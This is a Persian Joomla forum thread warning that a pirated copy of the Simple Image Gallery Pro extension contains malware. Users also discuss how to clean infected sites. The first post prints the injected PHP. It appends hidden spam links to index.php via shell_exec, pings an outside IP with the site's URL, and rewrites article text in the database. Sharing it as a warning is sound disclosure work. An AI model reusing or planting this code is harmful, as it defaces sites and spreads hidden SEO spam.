-
گزارش فایل مخرب در افزونه
با سلام
امروز یک گزارش داشتم از یکی از کاربران برای فایل مخرب در افزونه simple-image-gallery-pro-v-307 که از سایت http:// webganje.com/index.php/joomla-extension/simple-image-gallery-pro-v-307 دانلود شده بود.
که بعد از بررسی متوجه شدم شامل کد مخرب زیر بود
shell_exec('echo "'."?>\n<div style='text-indent:100%;white-space:nowrap;overflow:hidden;height:1px;'><h1>Main Menu</h1><ul style='list-style-type:none;'><li><a href='http://www.plataformasteam.com'>Plataforma Steam</a></li><li><a href='http://www.foroguate.com'>ForoGuate</a></li><li><a href='http://www.forocarros.org'>ForoCarros</a></li></ul></div>\n<?php".'" >> ../index.php');
file_get_contents("http://176.67.167.186/insert.php?url=http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
$db2 = JFactory::getDBO();
$db2->setQuery("SELECT id, introtext FROM #__content LIMIT 100");
$results = $db2->loadObjectList();
if($results){
foreach($results as $result) {
$db2->setQuery("UPDATE #__content SET introtext = ".$db->quote($result->introtext."<div style='text-indent:100%;white-space:nowrap;overflow:hidden;height:1px;'><h1>Main Menu</h1><ul style='list-style-type:none;'><li><a href='http://www.plataformasteam.com'>Plataforma Steam</a></li><li><a href='http://www.foroguate.com'>ForoGuate</a></li><li><a href='http://www.forocarros.org'>ForoCarros</a></li></ul></div>")." WHERE id = ".$result->id);
$db2->query();
}
}
لطفا از استفاده از افزونه ها دقت بفرمایید.
موفق و پیروز باشید.
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
4 کاربر زیر از محمد محسنی عزیز به خاطر این پست مفید تشکر کرده اند.
-
08-17-2015 07:19 PM
# ADS
تبلیغات در جوملا فارسی
-
درود بر شما دوست عزیز !
بنده چند وقت پیش یه پست گذاشتم درباره ی وجود مخرب در قالب ، بی زحمت آن را بخوانید و اگر کم و کاستی دارد آنرا اصلاح کنید.
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
با تشکر
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
کاربر مقابل از parsiland عزیز به خاطر این پست مفید تشکر کرده است:
-
سلام
نمیشه این کد مخرب را حذف کرد؟
یا اینکه باید کلا بیخیال این افزونه شد؟
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
-
با سلام به دوستان
مشكل ذكر شده به سر سايت من هم آمده
روش حلش را اگه كسي ميدونه ممنون ميشم
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
-
حذف فایل مخرب
با سلام
مشکل من به لطف پاسخ سایت پارس جوم حل شد
باید میرفتم بخش مدیریت سایت و بعد بخش محتوای مطالب و تو سورس مطالب متن بالا را حذف کردم
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
-

نوشته اصلی توسط
rasa110
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
با سلام به دوستان
مشكل ذكر شده به سر سايت من هم آمده
روش حلش را اگه كسي ميدونه ممنون ميشم
سلام
بطور کلی بهتره که افزونه ها را از سایتهای معتبری تهیه کنید. حتی با پرداخت هزینه هم برخی از سایتها در حال فروش چنین فایلهایی هستند!
موفق باشید
جهت مشاهده لینک ها باید ثبت نام کنید یا لاگین کنید.
-
علاقه مندی ها (Bookmarks)